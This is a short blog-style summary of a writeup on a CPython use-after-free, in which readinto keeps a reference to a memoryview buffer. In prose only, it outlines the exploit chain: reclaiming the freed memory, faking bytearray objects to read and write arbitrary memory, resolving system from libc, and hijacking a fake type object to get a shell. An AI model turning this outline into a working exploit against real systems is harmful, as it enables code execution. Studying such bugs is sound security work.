Use-After-Free in Python 2.7+
Taking an unexpected reference to a memoryview
object resulting in a use-after-free when the parent of said object is destroyed. Though this is a rather low impact bug because it requires control over the code being executed, so one could just write an os.system(...)
call or something similar. The post is a great writeup on the process of exploiting a use-after-free and has some notes about exploit stability as the author targeted having their exploit run across all versions of Python 3.
By providing a custom File
class that extends io.RawIOBase
a user could provide a malicious imeplement of the readinto
method. This is the method that a BufferedReader
will call into to actually read the underlying resource. It passes in a memoryview
which is the buffer into which the the contents should be read. If the readinto
method takes a reference to this buffer, placing it into a global variable then after the BufferedReader
is destroyed, any use of the global variable would result in a use-after-free. The root issue just seems to be not doing a proper reference count, however this bug is not slated to be fixed too soon. It requires someone able to inject arbitrary python, so you could simply use os.system(...)
in most cases to gain code execution.
Exploitation - Primitives
First step of the exploitation was just to reclaim the recently freed memory with a controlled object type. They did this by allocating a List of the same size as the buffer, and could consisently reclaim the improperly freed memoryview
. With this they now have two ways of accessing the memory, using the originally grabbed reference to the memoryview
, this gives them read/write access to all the bytes. And now as part of a list, where Python thinks it is a list of PyObject
buffers.
This List is what is used to craft the arbitrary read/write primitive.
Firstly, to know where any python object is in memory the id()
function call, will return the address, so ASLR for those objects is a non-issue. Then to get content they control directly in memory they used a bytes
object (like a b"string"
.) The payload of the string would be 32 bytes away from the address of the object itself.
Using this they could craft any fake Python object, place the pointer to the bytes
payload into the memoryview
and then access the object through the List object that reclaimed the memoryview
’s memory. Accessing it through the list will parse the crafted object from the bytes
payload. The bytes
payload for an arbitrary memory read/write primitive was a bytesarray
object. this object would contain a pointer to a backing buffer which could be accessed like any other array. So by crafting a fake bytesarray
pointing to the desired memory location, one could read/write any memory.
Exploitation - Chain
Now with the arbitrary read/write the rest was fairly straight forward, but they did take some extra steps for stability. To start they walked memory looking for the ELF header to calculate the CPython base address. Parsed the headers to find the PLT entries and resolve the address for system
from libc. Then faked a PyObject with a fake type object that gives them control over various object method/function pointers. Replacing one with the system address and call it for a shell.
Great writeup even if the impact isn’t huge it was a good read.